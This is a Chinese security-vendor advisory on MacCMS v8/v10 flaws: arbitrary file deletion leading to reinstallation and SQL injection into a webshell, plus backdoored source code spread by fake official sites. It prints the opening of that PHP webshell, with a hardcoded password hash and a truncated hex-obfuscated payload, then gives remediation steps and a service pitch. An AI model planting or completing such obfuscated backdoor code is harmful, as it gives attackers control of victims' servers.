苹果CMS漏洞修复 对SQL远程代码注入及任意文件删除修补办法
目前苹果cms官方在不断的升级补丁,官方最新的漏洞补丁对于目前爆发的新漏洞没有任何效果。更新补丁的用户网站还是会遭受到挂马的攻击,很多客户因此找到我们sine安全寻求网站安全技术上的支持,针对该漏洞我们有着独特的安全解决方案以及防止挂马攻击的防护,包括一些未公开的maccms poc漏洞都有修复补丁。
目前maccms官方被百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改! 苹果官方网站因为特殊原因已经停止访问,该内容被禁止访问,但是升级补丁更新的网址还是可以打开的。
截图如下:
苹果cms漏洞详情:
苹果cms v8 v10版本存在代码重装漏洞,以及代码后门漏洞,任意文件删除漏洞,通过cnvd-2019-43865的信息安全漏洞通报,可以确认maccms v10存在漏洞,可以伪造恶意代码发送到网站后端进行执行,可以删除网站目录下的任意文件,可删除重装苹果cms系统的配置文件,导致可以重新安装maccms系统,并在安装过程中插入sql注入代码到数据库中去执行并获取webshell以及服务器权限。
苹果cms v8 v10 源代码存在后门漏洞,经过我们sine安全技术的检测发现,存在后门的原因是,目前百度搜索苹果官网,maccms官方,排在百度搜索首页的都是仿冒的网站,真正官网地址是www.maccms.com,包括模板,图片,以及css跟真正的官方是一模一样,很多客户都是点击到这个山寨网站上去进行下载的源代码,该代码里隐藏了木马后门文件,阿里云都无法检测出来,
error_reporting(e_error);
@ini_set('display_errors','off');
@ini_set('max_execution_time',20000);
@ini_set('memory_limit','256m');
header("content-type: text/html; charset=utf-8");
$password = "21232f297a57a5a743894a0e4a801fc3"; //viv, bebegim..
define('viv, bebegim.','denzel-你的英雄'); // 标题
function s(){
$str = "66756r6374696s6r20737472646972282473747229207o2072657475726r207374725s
7265706p61636528617272617928275p5p272p272s2s272p27253237272p2725323
代码如上面所示,是加密过的,经过我们sine安全的解密发现是php的脚本木马,可以绕过各大服务器厂商的安全检测,包括阿里云,腾讯云,百度云,华为云。
关于苹果cms网站漏洞的修复方案与办法
对任意文件删除漏洞做安全过滤与检查,防止del删除的语句的执行,对前端传输过来的参数进行严格的检测,不管是get,post,cookies,如果您对代码不是太懂的话也可以找专业的网站安全公司来处理解决苹果cms网站被攻击的问题,或者是对重装文件进行改名以及安装配置文件进行权限设置,只读权限,对于存在网站木马后门的苹果cms系统,人工对代码进行安全审计,对所有网站目录下每个代码文件都要仔细的排查,可以下载官方的源代码进行比对。
上一篇: keyhook.exe是什么进程 有什么作用 keyhook进程查询
下一篇: 手机建站该如何设计?